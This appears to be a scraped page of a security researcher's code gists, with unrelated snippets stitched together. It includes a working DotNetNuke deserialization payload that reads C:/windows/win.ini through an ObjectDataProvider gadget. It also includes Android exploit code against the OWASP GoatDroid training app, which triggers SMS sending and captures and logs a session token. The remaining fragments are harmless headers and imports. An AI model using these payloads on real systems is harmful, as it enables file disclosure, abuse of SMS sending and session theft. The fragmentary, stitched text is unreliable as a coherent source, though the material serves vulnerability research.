Based on Chris Frohoff and Wouter Coekaerts ideas:
- https://gist.github.com/frohoff/24af7913611f8406eaf3
- http://wouter.coekaerts.be/2015/annotationinvocationhandler
Full project (containing dependencies) can be found here:
<profile><item key="name1:key1" type="System.Data.Services.Internal.ExpandedWrapper`2[[DotNetNuke.Common.Utilities.FileSystemUtils],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"><ExpandedWrapperOfFileSystemUtilsObjectDataProvider xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><ExpandedElement/><ProjectedProperty0><MethodName>WriteFile</MethodName><MethodParameters><anyType xsi:type="xsd:string">C:/windows/win.ini</anyType></MethodParameters><ObjectInstance xsi:type="FileSystemUtils"></ObjectInstance></ProjectedProperty0></ExpandedWrapperOfFileSystemUtilsObjectDataProvider></item></profile> |
Based on Chris Frohoff and Wouter Coekaerts ideas:
Full project (containing dependencies) can be found here:
// ==UserScript== | |
// @name LGTM stars | |
// @namespace http://tampermonkey.net/ | |
// @version 0.1 | |
// @description Show star counts | |
// @author Alvaro Muñoz (@pwntester) | |
// @match https://lgtm.com/query/* | |
// @grant none | |
// @run-at document-idle | |
// ==/UserScript== |
package org.pwntester.jaxrs_jdbc; | |
import com.fasterxml.jackson.annotation.JsonProperty; | |
import org.springframework.beans.factory.annotation.Autowired; | |
import org.springframework.jdbc.core.JdbcTemplate; | |
import org.springframework.jdbc.core.RowCallbackHandler; | |
import javax.ws.rs.*; | |
import javax.ws.rs.core.MediaType; | |
import java.sql.ResultSet; |
/** | |
* @name SSTI | |
* @kind path-problem | |
* @id java/ssti | |
*/ | |
import java | |
import semmle.code.java.dataflow.TaintTracking | |
import semmle.code.java.dataflow.FlowSources | |
import DataFlow |
Research:
Intent broadcastIntent=new Intent(); | |
broadcastIntent.setAction("org.owasp.goatdroid.fourgoats.SOCIAL_SMS"); | |
broadcastIntent.putExtra("phoneNumber","0034666666666"); | |
broadcastIntent.putExtra("message","Hi"); | |
sendBroadcast(broadcastIntent) |
@Override | |
public void onActivityResult(int requestCode, int resultCode, Intent data) { | |
super.onActivityResult(requestCode, resultCode, data); | |
switch(requestCode) { | |
case (STATIC_INTEGER_VALUE) : { | |
if (resultCode == Activity.RESULT_OK) { | |
Log.w("alvms", "4Goats SessionToken: " + data.getStringExtra("sessionToken")); | |
} | |
break; |
Intent tokenIntent = new Intent(); | |
tokenIntent.setComponent(new ComponentName("org.owasp.goatdroid.fourgoats","org.owasp.goatdroid.fourgoats.activities.SocialAPIAuthentication")); | |
startActivityForResult(tokenIntent, STATIC_INTEGER_VALUE); |
<service android:name=".services.LocationService" > | |
<intent-filter> | |
<action android:name="org.owasp.goatdroid.fourgoats.services.LocationService" /> | |
</intent-filter> | |
</service> | |
<receiver | |
android:name=".broadcastreceivers.SendSMSNowReceiver" | |
android:label="Send SMS" > | |
<intent-filter> |